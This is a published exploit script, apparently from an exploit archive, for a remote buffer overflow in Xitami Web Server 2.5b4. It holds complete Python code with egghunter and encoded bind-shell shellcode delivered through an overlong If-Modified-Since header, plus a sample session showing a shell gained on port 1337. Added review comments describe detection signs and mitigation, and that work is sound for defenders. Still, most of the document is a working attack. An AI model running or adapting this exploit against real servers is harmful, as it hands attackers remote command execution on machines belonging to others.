
# Title : Xitami Web Server 2.5b4 Remote Buffer Overflow (Egghunter)
# Published : 2011-06-04
# Author : Glafkos Charalambous


			
# Exploit Title: Xitami Web Server 2.5 Remote Buffer Overflow (Egghunter)
# Date: June 4, 2011
# Author: Glafkos Charalambous
# Version: 2.5b4
# Tested on: Windows XP SP3 En
# Discovered by: Krystian Kloskowski
#
# root@bt:~/Desktop# python xitami.py 192.168.0.24 80
# [+] Connected
# [+] Sending payload...
# [+] Check Port 1337 for your shell
# root@bt:~/Desktop# telnet 192.168.0.24 1337
# Trying 192.168.0.24...
# Connected to 192.168.0.24.
# Escape character is '^]'.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:/Xitami>ipconfig
# ipconfig
#
# Windows IP Configuration
#
#
# Ethernet adapter Local Area Connection:
#
#        Connection-specific DNS Suffix  . : 
#        IP Address. . . . . . . . . . . . : 192.168.0.24
#        Subnet Mask . . . . . . . . . . . : 255.255.255.0
#        Default Gateway . . . . . . . . . : 192.168.0.1
#
# C:/Xitami>
#
# NOTE(review): proof-of-concept for a buffer overflow in Xitami 2.5b4.
# The malformed input is delivered in a single unauthenticated GET request,
# in the If-Modified-Since header (see `header` below), so from a defender's
# side the trigger is easy to spot: an If-Modified-Since value that is not a
# date and is hundreds of bytes long (~1 KB here), followed by a new listener
# on TCP/1337 on the web-server host. The return address used is tied to one
# exact OS build (see the jmp esp comment), but the overflow itself is not;
# mitigation is to retire or upgrade the affected server version rather than
# rely on the PoC failing on other builds.
# Listing is reproduced as extracted from the source page (Python 2 syntax).

import time
import socket
import sys

# Usage check: exactly <Target IP> <Target Port> are expected.
if len(sys.argv) != 3:
    print "Usage: ./xitami.py <Target IP> <Target Port>"
    sys.exit(1)

target = sys.argv[1]
port = int(sys.argv[2])

# Egghunter stub (per the author's naming): a small first-stage routine that
# locates the 8-byte marker placed in front of the real payload further down
# in `buf` and continues execution there. "w00t" is the 4-byte tag it looks
# for; it appears doubled ("w00tw00t") in the final buffer.
egghunt = ("/x66/x81/xCA/xFF/x0F/x42/x52/x6A/x02"
           "/x58/xCD/x2E/x3C/x05/x5A/x74/xEF/xB8"
           "w00t" # 4 byte tag
           "/x8B/xFA/xAF/x75/xEA/xAF/x75/xE7/xFF/xE7")

# Second stage, generated with the Metasploit command below: a bind shell on
# TCP/1337 (exitfunc=process), passed through 7 rounds of shikata_ga_nai to
# avoid the bytes 0x00/0x0a/0x0d. Because it is polymorphically encoded, a
# byte signature on this blob is not a reliable detection; the listener on
# 1337 and the request shape above are.
# ./msfpayload windows/shell_bind_tcp lport=1337 exitfunc=process R | ./msfencode -b '/x00/x0a/x0d' -e x86/shikata_ga_nai -c 7 -t c
shellcode = (
"/xba/xa2/xcf/xad/x8d/xdb/xd1/xd9/x74/x24/xf4/x5e/x29/xc9/xb1"
"/x7e/x83/xee/xfc/x31/x56/x11/x03/x56/x11/xe2/x57/x70/xe4/x08"
"/x09/x2d/x2e/xd1/xec/x46/xf5/x22/x56/x96/x3c/x7b/x1e/x5b/x7e"
"/x78/xef/x23/x71/x82/x3e/x5f/xf1/xd3/x58/x3b/x53/x30/xe6/xbc"
"/x82/xb3/xba/xf5/xdf/x9e/x21/x78/xcd/x8d/x25/x87/x5b/xd4/xfd"
"/x6c/xcd/xcf/x7b/x68/x84/x3d/x07/xcb/x1e/x1b/x06/x11/x31/xfd"
"/x90/x27/xff/xe6/x22/x4d/xdd/x1a/xc9/xe1/x93/x45/x4b/x13/x48"
"/x74/xcc/x45/x07/x95/xd1/x38/xde/xa3/xef/x7d/x68/xb0/xd1/x67"
"/x60/xe5/x89/xb5/xf7/x3e/x2f/x49/xd7/xb8/xc0/xc6/x1b/xfc/xe2"
"/xbb/xc8/xae/x39/x78/x81/x4d/xc4/x1c/x2d/x16/x6d/xc3/x04/xde"
"/x58/x43/x4e/xc5/x60/x46/x4b/xc9/x79/xfb/x32/xdd/x46/xb8/xd4"
"/x61/x62/x92/xf6/xe8/x7b/xe8/x41/xc0/xee/xe2/xbb/x64/x6c/xb8"
"/x43/x2d/xfd/xda/x61/xb0/x7c/xe6/x36/xab/x3e/x7a/x80/xe6/x60"
"/x2b/x52/x1d/x53/xed/xb4/x94/x86/x8b/x66/x26/x56/x67/xe0/x7c"
"/xfb/x1c/xb9/x4f/x75/x4e/x7d/x63/xac/xbc/x7e/x90/xfd/xa1/xb2"
"/x6b/x06/xb4/x92/x1f/x90/x26/x1a/x4f/x3d/x18/xa2/x3c/x72/x0f"
"/x93/x37/xf7/xf3/x5a/x7f/x33/xbf/x9f/xc2/xea/xb9/x13/x6c/x77"
"/xb6/xd4/xc0/x37/x86/x78/xd3/x86/x8c/x9f/x3a/x0f/xb1/x5e/x0f"
"/xb9/x09/xf1/x0c/xe9/x2f/xb7/xd7/xea/x37/x4f/x6a/xc3/xdb/x7b"
"/x48/x32/x05/xd4/x48/xcc/x47/x59/x41/xc5/x0b/xf5/x02/xeb/x06"
"/x7f/xae/x25/x2b/x16/x2d/x51/x18/x91/x9c/x96/x32/x17/x1c/x6e"
"/x95/xb9/x4e/xf5/xa6/x29/x8b/x30/x48/x07/x55/xf1/xe4/xa8/xe2"
"/x4d/xe0/x6a/xef/xd3/x4e/x07/x4d/xb2/x25/xe0/xb2/x33/x1b/xdc"
"/x50/xac/x59/x35/xd9/x91/x9c/x44/x5a/xc1/x52/x19/x0f/x03/xc9"
"/x1d/x71/xe5/x79/x54/x3d/xc0/x87/x4d/x9f/x9d/x69/x09/xd4/x6b"
"/xe2/xa5/xe0/x77/xd0/xb9/xbd/x85/xd0/x35/xcb/x59/x78/x22/xf2"
"/x25/x78/x64/xf6/x2a/x8d/x3e/xc8/xce/x7c/x6f/x64/x24/xb4/x2c"
"/x14/xd5/xff/x9c/x84/x40/xf1/x74/xcf/x3c/x4f/xac/x2c/xe2/xae"
"/xaa/xaf/xb0/xcf/xc8/x31/x30/xb3/xb0/x8b/x08/x25/x2d/x95/x3d"
"/xf5/x0c/x1f/x23/xd9/x87/x31/x79/xd2/x8d/xad/x59/xdd/xb0/x4c"
"/xa4/x17/xeb/x97/xb0/x90/x3c/x45/xb7/x3f/x2b/x04/xf3/xc6/xe8"
"/x56/x25/x7a/xfd/x6e/x3b/xef/x64/x14/x9b/x67/x08/x9c/x47/x73"
"/x24/x1e/x1e/xc6/xd2/xad/xcc/x0c/xc8/xbb/x4e/x12/xde/xf5/x35"
"/x25/xe0/xb0/xef/x04/xb5/x29/x62/xc6/x56/x44/x52/x16/xa3/x63"
"/x63/xcd/xd1/xc9/x45/x87/x3b/xd6/x4b/x7a/x24/xd5/xd4/x7d/x4c"
"/x83/x06/x16/x88/x7f")

# Two-byte short forward jump; presumably lands inside the NOP sled that
# precedes the egghunter (0x22 < the 50-byte sled) — not verifiable here.
jump = "/xeb/x22" # short jump

# Buffer layout, in order: 72 bytes of filler up to the overwritten return
# address, then the return address itself, then the staged code.
buf = "A" * 72                  
# Return address overwrite: a jmp esp inside user32.dll. This is a fixed
# address specific to Windows XP SP3 English (no ASLR on that platform), which
# is why the PoC only "works" there; other builds will usually just crash the
# server process, i.e. a denial of service rather than code execution.
buf += "/xD7/x30/x9D/x7C" # jmp esp (user32.dll) / XP SP3 English
buf += jump
buf += "/x90" * 50
buf += egghunt
buf += "w00tw00t" # tag
buf += shellcode

# The entire buffer is sent as the value of If-Modified-Since; everything
# else in the request is a minimal, valid HTTP/1.1 GET.
header = ('GET / HTTP/1.1/r/n'
          'Host: %s/r/n'
          'If-Modified-Since: pwned, %s/r/n'
          '/r/n') % (target, buf)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((target, port))
    print "[+] Connected"
except:
    # Bare except: any failure (resolution, refused, timeout, KeyboardInterrupt)
    # is reported as a connection failure; left as written.
    print "[!] Connection Failed"
    sys.exit(0)

print "[+] Sending payload..."
# Single send, no response is read; the script cannot tell success from a
# crash, it only waits a second before closing.
s.send(header)
time.sleep(1)
s.close()
print "[+] Check port 1337 for your shell"